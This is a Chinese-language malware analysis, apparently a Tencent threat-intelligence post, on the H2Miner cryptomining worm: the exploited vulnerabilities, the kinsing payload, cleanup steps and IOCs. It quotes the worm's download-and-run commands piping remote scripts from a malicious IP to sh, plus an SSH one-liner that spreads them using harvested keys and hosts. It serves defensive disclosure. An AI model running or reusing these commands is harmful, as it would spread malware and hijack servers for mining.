Linux服务器遭遇挖矿蠕虫攻击,已有数千台服务器中招

2020-07-31 来源:原创 作者:腾讯电脑管家
【文章摘要】腾讯安全威胁情报中心捕获H2Miner挖矿蠕虫新变种。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危漏洞入侵Linux系统,并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心预估已有数千台服务器中招,腾讯安全专家建议相关企业尽快排查服务器被入侵的情况,及时清除H2Miner挖矿蠕虫病毒。

一、概述

腾讯安全威胁情报中心捕获H2Miner挖矿蠕虫新变种。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危漏洞入侵Linux系统,并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心预估已有数千台服务器中招,腾讯安全专家建议相关企业尽快排查服务器被入侵的情况,及时清除H2Miner挖矿蠕虫病毒。

腾讯安全威胁情报中心本次捕获的H2Miner挖矿蠕虫样本会下载恶意脚本及恶意程序进行挖矿牟利,横向扫描扩大攻击面并维持与远程服务器(C2)通信,令服务器变成黑客控制的肉鸡。同时,具有卸载云服务器安全软件、删除云服务器镜像的能力,会给企业云服务器安全带来严重影响。

H2Miner挖矿蠕虫利用的高危漏洞包括:

Redis未授权RCE

Solr dataimport RCE(CVE-2019-0193)

Hadoop Yarn REST API未授权RCE(CVE-2017-15718)

Docker Remote API未授权RCE

ThinkPHP5 RCE

Confluence 未授权RCE(CVE-2019-3396)

SaltStack RCECVE-2020-11651

等多个Web应用漏洞。

此次H2Miner变种更新了C2服务器地址,在横向移动时会从/.ssh/config, .bash_history, /.ssh/known_hosts等多个文件中搜索目标机器和认证信息,并利用搜索得到的userlisthostlistkeylistsshports进行组合尝试爆破登陆,从而扩大其攻击范围。


二、样本分析

Docker是一个开源的应用容器引擎,开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。Docker swarm docker官方提供,是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展。使用docker swarm的时候,管理的docker 节点上会开放一个TCP端口2375(或2376)。

攻击者利用未受保护的开放Docker API端口进行攻击,并执行恶意命令:

wget -q -O – http[:]//93.189.43.3/d.sh | sh

d.sh执行以下操作:

1.     禁用SELINUX并清除系统日志:echo SELINUX=disabled >/etc/selinux/config

2.     卸载阿里云骑士和腾讯云镜;

3.     清除竞品挖矿木马;

4.     杀死正在运行的恶意Docker容器并删除它们的映像;

5.     下载恶意程序“kinsing”并运行;

6.     通过crontab定时任务每分钟下载和执行shell脚本;

7.     删除竞品挖矿木马的crontab定时任务。

下载得到的kinsing采用Golang编写,被编译为Linux平台可执行程序,主要有以下功能:

1.下载文件并执行;

2.启动和维持挖矿程序;

3.C&C服务器通信,接收并执行远程命令;

3.利用masscan对外扫描;

4.针对redis服务进行爆破攻击;

5.下载shell脚本http[:]//93.189.43.3/spre.sh,以进行横向移动。


受影响的主机会以http的方式与C&C服务器185.154.53.140进行通信,其中肉鸡的信息在http头部中标识。


Kinsing释放门罗币挖矿木马到/tmp/kdevtmpfsi,然后启动连接矿池xmr-eu1.nanopool.org挖矿,配置中使用门罗币钱包为:

46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb

挖矿使用矿池和钱包与腾讯安全此前捕获到的版本(H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿,已获利370万元http://www.royalbarrywills.com/mp.weixin.royalbarrywills.com/s/eLnQxa_hXxhNhyquOThW7Q)中使用的相同。




横向移动

Spre.sh是用于在网络中横向传播H2Minershell脚本。为了发现攻击目标并找与其相对应的身份验证的信息,脚本会从 /.ssh/config, .bash_history, /.ssh/known_hosts进行搜索和匹配。

利用收集到的信息,恶意脚本尝试通过SSH连接到每个主机,使用每个可能的用户和密钥组合进行爆破登陆,以便在网络中的其他主机或容器上下载和运行shell脚本Spr.shspr.sh与最初攻击时的d.sh相同。

以下SSH命令用于在网络中传播H2Miner

ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http[:]//93.189.43.3/spr.sh|sh; sudo wget -q -O - http[:]//93.189.43.3/spr.sh|sh;"


三、手动清除H2Miner建议

1、 查找路径为/tmp/kinsing/tmp/kinsing2/tmp/kdevtmpfsi的进程,将其kill掉并删除对应的文件;

2、 查找crontab任务中包含“195.3.146.118”的相关项并删除。


IOCs

IP

195.3.146.118

142.44.191.122

185.92.74.42

217.12.221.244

93.189.43.3

185.154.53.140

Md5

kdevtmpfsi

8c6681daba966addd295ad89bf5146af

kinsing

52ca5bc47c84a748d2b349871331d36a

a.sh

e3af308c4a4130dd77dc5772d801ebab

cron.sh

bd405b37e69799492a58a50f5efc2725

d.sh

be17040e1a4eaf7e2df8c0273ff2dfd2

ex.sh

7f469ccecbf9d0573f0efd456e8e63a7

h2.sh

1b34c5bb3a06c4439b5da77c49f14cf7

j.sh

41640173ddb6a207612ee052b48dd8be

lf.sh

bac660c7aa23f4fda6c699c75b4b89f1

p.sh

e040303652c05dbf6469c9c3ce68031a

pa.sh

18dc6621299b855793bdeaad8ef5af23

s.sh

1c489a326a4d37fbf02680bbd6f38b4f

spr.sh

255779cf6134f3ac5133f04868e3956c

spre.sh

639d87d54aa57371cc0bf82409503311

t.sh

ae9017bbeac57bc4de1ac5f59d59c519

tf.sh

831093a5a825ab096c2fc73a7a52bbf1

al.sh

d06e2a3f52043c3a3c3ecf1f406b8241

URL

http[:]//bitbucket.org/tromdiga1/git/raw/master/kinsing

http[:]//bitbucket.org/tromdiga1/git/raw/master/for

http[:]//93.189.43.3/kinsing

http[:]//93.189.43.3/kinsing2

http[:]//93.189.43.3/spr.sh

http[:]//93.189.43.3/spre.sh

http[:]//93.189.43.3/a.sh

http[:]//93.189.43.3/cron.sh

http[:]//93.189.43.3/d.sh

http[:]//93.189.43.3/ex.sh

http[:]//93.189.43.3/h2.sh

http[:]//93.189.43.3/j.sh

http[:]//93.189.43.3/lf.sh

http[:]//93.189.43.3/p.sh

http[:]//93.189.43.3/pa.sh

http[:]//93.189.43.3/s.sh

http[:]//93.189.43.3/t.sh

http[:]//93.189.43.3/tf.sh

http[:]//93.189.43.3/al.sh

参考链接:

http://blog.nsfocus.net/docker-remote-api-unauthorized-access-vulnerability/

H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿,已获利370万元

http://www.royalbarrywills.com/mp.weixin.royalbarrywills.com/s/eLnQxa_hXxhNhyquOThW7Q


电脑管家V13.6

游戏助手全新升级

详情>>

版本更新:2020.08.27